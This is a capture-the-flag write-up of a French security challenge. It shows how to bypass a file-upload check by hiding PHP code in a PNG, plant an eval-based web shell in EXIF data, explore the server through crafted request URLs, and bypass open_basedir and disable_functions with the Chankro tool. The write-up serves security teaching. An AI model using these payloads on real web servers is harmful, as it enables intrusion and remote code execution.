-=[File Upload vulnerability, combined with the sendmail php CVE]=-

We login at : http://challenges.ecsc-teamfrance.fr:8001/

We create an account. We came on a TODO page where we can save a file with a title and a description

Step 1 :

GUI Discover and Upload exploit We upload a random file to trigger an error or something new The error tell us our file is a PNG or JPG image with size inferrior to 100kb.

I decided to had PHP code such as " " at the end of picture. Change the extension of the file to .php

1echo "<?php phpinfo(); ?>" >> monimage.png
2cp monimage.png monimage.php

Look at the uploaded image, nice our php command worked !

We can see a the famous Phpinfo page. The phpinfo() command executed in our page give us interesting informations such as openbasedir restrictions, and disablefunctions. Now let’s had a Remote Commande Execution parameter to our picture.

1exiftool -comment="<?php eval(\$_GET['cmd']) ?>" monimage.png

Don’t forget to escape $ with \ because of bash

Step 2 : Discover Backend We can now have an access to the backend with our cmd parameter option. –> Active error (debug mode)

1http://[..]:8001/upload/c69c252b[...]29db4a/monimage.php?cmd=init_set(‘display_error’, 1);

–> List /tmp content (saw that path in the openbasedir restriction category)

1http://[..]:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a /monimage.php?cmd=init_set(‘display_error’, 1);print_r(scandir(‘/tmp’));

–> A read “LABOUSSOLE” file in /tmp

1http://[..]:8001/upload/c69c252b[...]29db4a/ monimage.php?cmd=init_set(‘display_error’, 1);var_dump(readfile(‘/tmp/LABOUSSOLE’));

==> in the file : “RDV 00h00 a la bousolle “ It must be a public folder on the server, people can write in it. I also tried.

1http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b[...]29db4a/ monimage.php?md=i nit_set(‘display_error’, 1); file_put_contents(‘/tmp/jadorelablockchain’, “test”);

Try to read my file. It work.

Step 3 :

Looking into other vulnerabilities I was looking for other vulnerability. I tried to read from the /, but openbasedir restrictions don’t permit it. #1ST IDEA A vulnerability with glob:///* to bypass openbasedir restrictions. I can list from /. Look here for : https://bugs.php.net/bug.php"

I can see a flag file but i haven’t the absolute path to the file. So i ‘can’t read it. Payload i used :

1<?php if ($dh = opendir($_GET[1])) { while (($file = readdir($dh)) !== false) { echo var_dump($file); } closedir($dh); } ?>

Never mind… #2ND IDEA I looked for CVE about sendmail in php. Few month ago I heard about that CVE. Check that link for more :

ExploitBox

Saotn

tothi

I found a tool called : “Chankro” https://github.com/TarlogicSecurity/Chankro He permits to bypass open_basedir restrictions and used disable_functions. Such a great found. –> How the tool work :

1. Created my payload rev.sh :

1find / -name flag -type f 2>/dev/null > /var/www/html/upload/c69c252b25275de8373e7915a80f4 bab6419c790de8a4bd6f29fbe7cb529db4a/flag.txt

(Find the flag file, redirect error to /dev/null, print the content of the flag file into my upload folder in flag.txt)

2. Option –path is for the destiantion option I Get the EXPLOIT. So I had the tool output into the my picture EXIF.

1\$ exiftool -comment="[...]" monimage2.png

Back to the menu, upload my picture, open it in the application.

http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a/monimage2.php

`Go to the flag.txt destination to see if it work.

http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a/flag.txt

.: FLAG :.